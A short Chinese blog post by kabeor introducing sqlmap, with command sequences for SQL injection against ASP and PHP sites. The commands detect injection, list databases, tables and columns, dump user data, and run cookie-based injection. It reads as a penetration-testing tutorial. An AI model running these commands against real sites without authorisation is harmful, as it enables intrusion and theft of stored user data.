avatar

目录
SQLMAP介绍

ASP网站渗透

常用: 明小子,啊D,NBSI,御剑

asp网站常用access(文件数据库)

sqlmap -u "网站"
-u检测是否存在注入漏洞,返回数据库名
sqlmap -u "网站" --tables
-tables猜解所有表名

找到用户表

sqlmap -u "网站" --columns -T "表名"
–columns根据表猜解列名

sqlmap -u "网站" --dump -C "列名" -T "表名"
–dump下载数据

PHP网站渗透

检测
sqlmap -u "网站"

sqlmap -u "网站" --is-dba

列出所有数据库
sqlmap -u "网站" -dbs

查找自己数据库
sqlmap -u "网站" --current-db

猜解所有表名,根据数据库查询
sqlmap -u "网站" --tables -D"数据库名"

sqlmap -u "网站" --columns -T "表名" -D "数据库名"

查询列的字段
sqlmap -u "网站" --dump -C "列名" -T "表名" -D "数据库名"

Cookie注入

sqlmap -u "网站" --cookie "id=参数" --level 2
cookie注入需要提升权限为2

猜解
sqlmap -u "网站" --tables --cookie "id=参数" --level 2

sqlmap -u "网站" --columns -T "表名" --cookie "id=参数" --level 2

sqlmap -u "网站" --dump -C "列名" -T "表名" --cookie "id=参数" --level 2

文章作者: kabeor
文章链接: https://kabeor.github.io/SQLMAP%E4%BB%8B%E7%BB%8D/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 K's House

评论